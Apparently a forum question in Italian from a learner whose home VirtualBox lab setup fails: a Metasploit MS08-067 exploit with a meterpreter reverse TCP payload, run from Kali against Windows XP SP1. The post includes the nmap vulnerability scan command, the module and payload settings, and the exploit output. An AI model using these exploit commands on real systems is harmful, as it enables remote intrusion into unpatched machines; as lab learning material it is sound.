Sto imparando come usare Metasploit. Sto usando VirtualBox per eseguire una VM con Kali Linux (192.168.56.101) e un'altra con Windows XP SP1 (192.168.56.103). Le due macchine virtuali possono eseguire il ping tra loro e Windows Firewall è disabilitato. Sto eseguendo Metasploit su Kali Linux e sto tentando di attaccare Windows XP SP1.
Accendo msfconsole e inizio con una scansione delle porte:
nmap -sT -A --script=smb-check-vulns -Pn --script-args=unsafe=1 192.168.56.103
che mi dice
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
Ho impostato i parametri in questo modo:
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.103 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.56.101 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
Quindi:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.101:8080
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
No active sessions.
Che cosa sto sbagliando?
Modifica: ho fatto lo stesso con una macchina virtuale Windows XP SP3 e ha funzionato! Non capisco davvero perché non funzionerà con Windows XP SP1 ...